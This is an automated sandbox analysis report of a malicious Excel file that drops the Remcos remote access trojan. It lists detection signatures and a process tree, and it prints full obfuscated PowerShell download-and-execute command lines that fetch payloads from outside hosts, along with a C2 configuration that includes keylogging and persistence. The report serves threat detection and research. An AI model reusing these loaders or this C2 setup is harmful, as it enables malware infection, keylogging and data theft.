Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pi-77159.xls

Overview

General Information

Sample name:pi-77159.xls
Analysis ID:1559540
MD5:65fbcc8da027e55f200e662f94037339
SHA1:a45ff70dd8f364f4d3f0d4be15430fd288bdbbf7
SHA256:cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3552 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3844 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3976 cmdline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3320 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3308 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 892 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 1368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 1712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • AcroRd32.exe (PID: 808 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    • mshta.exe (PID: 3652 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3784 cmdline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3192 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3128 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 1080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 1940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 1260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6b6f8:$a1: Remcos restarted by watchdog!
              • 0x6bc70:$a3: %02i:%02i:%02i:%03i
